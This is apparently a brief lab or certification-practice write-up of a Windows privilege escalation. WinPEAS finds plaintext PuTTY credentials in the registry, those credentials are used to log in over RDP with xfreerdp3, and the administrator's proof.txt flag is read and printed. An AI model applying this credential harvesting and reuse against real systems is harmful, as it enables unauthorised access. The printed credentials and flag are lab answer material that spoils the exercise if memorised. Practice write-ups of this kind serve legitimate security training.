6a68dc6059ee54a8bee83a5ba5652452Privilege Escalation
Found plaintext credentials in Putty sessions registry using WinPEAS (zachary / Th3R@tC@tch3r)
Putty Sessions
RegKey Name: zachary
RegKey Value: "&('C:\Program Files\PuTTY\plink.exe') -pw 'Th3R@tC@tch3r' zachary@10.51.21.12 'df -h'"
=================================================================================================Connected to target via RDP using previously discovered credentials
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ xfreerdp3 /u:'zachary' /p:'Th3R@tC@tch3r' /v:192.168.202.145 Read proof.txt file
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 2879-D413
Directory of C:\Users\Administrator\Desktop
01/05/2023 11:53 PM <DIR> .
01/05/2023 11:53 PM <DIR> ..
12/15/2025 05:07 AM 34 proof.txt
1 File(s) 34 bytes
2 Dir(s) 9,171,681,280 bytes free
C:\Users\Administrator\Desktop>type proof.txt
4c19b5972793ab554db418a0f6639c4a